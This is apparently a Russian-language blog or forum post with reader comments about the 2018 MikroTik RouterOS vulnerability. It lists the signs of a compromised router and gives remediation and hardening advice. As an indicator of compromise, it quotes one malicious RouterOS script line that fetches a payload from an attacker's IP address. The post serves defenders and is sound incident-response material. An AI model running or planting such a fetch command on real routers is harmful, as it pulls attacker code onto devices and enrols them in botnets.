Уязвимости MikroTik
К сожалению скриншотов не будет. Будет сухой текст.
23 апреля 2018 года обнаружена уязвимость всех продуктов микротик на RouterOS.
Причем уязвимость позволяет узнать логин и пароль, беспрепятственно войти в систему и сделать с роутером всё что угодно.
Всё бы было настолько буднично если бы 24 июля я не обнаружил бы на своем роутере и роутерах компании эту заразу. Распространяется очень быстро.
Характерные приметы: В System - scripts появляются посторонние скрипты, вот один из них:
/tool fetch address=95.154.216.164 port=2008 src-path=/mikrotik.php mode=http
В файлах соответственно mikrotik.php
Отключаются все запрещающие правила фаервола.
Создаются задачи в планировщике по запуску скрипта.
Открывается сокс-прокси на нестандартном порту.
Меняются адреса днс-серверов.
Т.е. микротик готовится к участию к какой-нибудь ддос-атаке или иным задачам по команде с сервака.
Самый оптимальный вариант - обновить прошивку микротика до RouterOS 6.40.8 [bugfix] or 6.42.1 [current] и откатиться из бекапа.
Если бекапа нет, но есть базовые познания то возможно выполнить команду export file=config_backup.rsc и уже на компьютере открыв в блокноте этот файл спокойно повыпиливать лишние строки. Сбросить роутер на заводские настройки и импортировать уже подрихтованный файл конфигурации.
Ну пару советов по безопасности:
IP - Services отключить все неиспользуемые сервисы. Для используемых жестко задать IP-адреса с которых они доступны. При желании сменить порты на нестандартные.
Грамотно настроить фаерволл.
В случае если факт взлома был зафиксирован - сменить пароль на микротик.
Подробнее здесь https://forum.mikrotik.com/viewtopic.php?t=133533
у меня 6.42.6 (актуальная на данный момент), то есть уязвимости нет?
PS. Почитал пост по ссылке - автор опоздал на 3 месяца с инфой, для тех кто обновляется на актуальные проши пост не несет никакой инфы.
Чтобы огрести проблем нужно разрешить доступ к winbox снаружи.
В дефотловых конфигурациях он отключен на *-gateway портах.
Итого автор сделал дыру, забил на обновления, игнорировал письмо об обновлениях, в итоге получил проблемы, ура!
Компания Microsoft, к примеру, каждую неделю выпускает патчи безопасности, которые закрывают подобного рода дыры и exploit'ы.
С подключением.
RouterOS для того и создавался, чтобы настроить систему под безопасность, а не по умолчанию.
Для этого есть Watchdog. Для этого есть скрипт автообновления.
Обновляйтесь вовремя, настраивайте оборудование с применением головы, и да прибудет с вами сила джедая.
А если вместо головы - жопа, и дальше квиксета через винбокс не ушли - то ничего не поможет.
Пару штук то же взломано оказалось ((( Из изменений запись в шедулере на запуск скрипта, скрипт качает нулевой файл с указанного Ip (видимо пока нулевой или уже нулевой) плюс сняты ограничения на днс запросы из вне и на сброс invalid соединений. А так же активирован socs c портом на 4145. Больше изменений вроде как нет сравнивал два конфига из бэкапа и тот что после взлома. Кто еще нашел какие изменения ? А то ездить по объектам сбрасывать в ноль желания как то нету !